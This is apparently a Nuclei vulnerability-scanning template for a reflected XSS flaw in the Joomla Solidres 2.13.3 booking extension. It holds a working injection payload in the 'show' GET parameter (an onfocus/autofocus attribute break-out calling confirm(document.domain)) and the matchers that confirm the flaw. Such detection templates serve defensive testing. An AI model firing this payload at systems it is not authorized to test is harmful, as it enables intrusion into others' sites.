id: joomla-solidres-xss

info:
  name: Joomla Solidres 2.13.3 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Joomla extension for Solidres - Online Booking System & Reservation Software is vulnerable to XSS in GET parameter 'show'.
  reference:
    - https://www.exploit-db.com/exploits/51638
    - https://cxsecurity.com/issue/WLB-2023070080
    - https://cyberlegion.io/joomla-solidres-2-13-3-cross-site-scripting/
  metadata:
    verified: true
    max-request: 1
  tags: xss,joomla,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=db8ck%22onfocus=%22confirm(document.domain)%22autofocus=%22xwu0k"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'onfocus="confirm(document.domain)"autofocus'
          - 'com_solidres'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200

# digest: 4a0a0047304502207b7244d2ec594834596770fc6f8748e1aa94a3791d7da38a09b63e63e184f601022100aa0d2f3b1ba68220120d135bec48e5d5c3a727623e1b5ea69ef4bff3665e202d:922c64590222798bb761d5b6d8e72950